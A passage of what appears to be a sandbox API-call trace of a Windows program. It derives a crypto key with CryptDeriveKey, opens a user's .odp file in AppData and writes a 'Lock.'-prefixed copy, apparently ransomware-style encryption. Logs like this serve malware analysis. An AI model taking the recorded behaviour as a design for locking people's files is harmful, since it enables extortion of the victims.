returned 0 [0152.185] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.185] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.185] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.185] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.185] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.185] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0152.185] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.185] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0152.185] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.185] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.185] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0152.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaa360, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0152.185] CryptCreateHash (in: hProv=0x9bf000, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0152.185] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.189] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.189] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.189] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0152.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a719e8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0152.189] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0152.189] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0152.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0152.189] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.189] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.189] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.189] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.189] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.189] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.189] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0152.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaa468, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0152.189] CryptHashData (hHash=0x9e2278, pbData=0x2a72748, dwDataLen=0x3, dwFlags=0x1) returned 1 [0152.189] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.206] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.206] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.206] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.206] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.206] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.206] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.206] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.206] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0152.206] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.206] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0152.206] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.206] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.206] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0152.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaa450, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0152.206] CryptDeriveKey (in: hProv=0x9bf000, Algid=0x6601, hBaseData=0x9e2278, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1af8) returned 1 [0152.206] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.206] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.206] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.206] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.206] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.207] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.207] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.207] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0152.207] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.207] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0152.207] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0152.207] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0152.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7120, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0152.207] CryptDestroyHash (hHash=0x9e2278) returned 1 [0152.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7720 [0152.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0152.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0152.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0152.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0152.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0152.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0152.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0152.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0152.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0152.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0152.207] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0152.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0152.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4c8 [0152.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0152.208] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0152.208] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.208] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.208] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0152.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0152.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0152.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0152.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0152.209] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/xin7s.odp" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\xin7s.odp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f8 [0152.209] SetFilePointerEx (in: hFile=0x4f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.209] SetFilePointerEx (in: hFile=0x4f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0152.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7200 [0152.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0152.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0152.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0152.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0152.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0152.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0152.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0152.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0152.209] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0152.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0152.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0152.209] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0152.209] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0152.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0152.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0152.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0152.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0152.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0152.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0152.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0152.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0152.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0152.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0152.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0152.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0152.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0152.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0152.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0152.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0152.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0152.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0152.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a684e8 [0152.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0152.210] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0152.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684e8 | out: hHeap=0x2af0000) returned 1 [0152.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0152.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0152.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a138 [0152.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0152.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0152.210] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.xin7s.odp" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.xin7s.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a4 [0152.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6e80 [0152.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0152.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0152.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0152.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0152.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0152.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0152.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0152.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0152.211] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0152.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0152.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0152.211] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0152.211] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0152.211] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0152.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0152.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0152.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0152.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0152.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0152.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0152.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0152.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0152.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0152.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0152.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0152.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0152.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0152.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0152.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0152.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0152.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0152.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0152.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0152.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0152.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0152.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0152.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0152.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0152.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0152.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0152.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0152.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0152.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0152.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0152.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x4cd8020 [0152.215] SetFilePointerEx 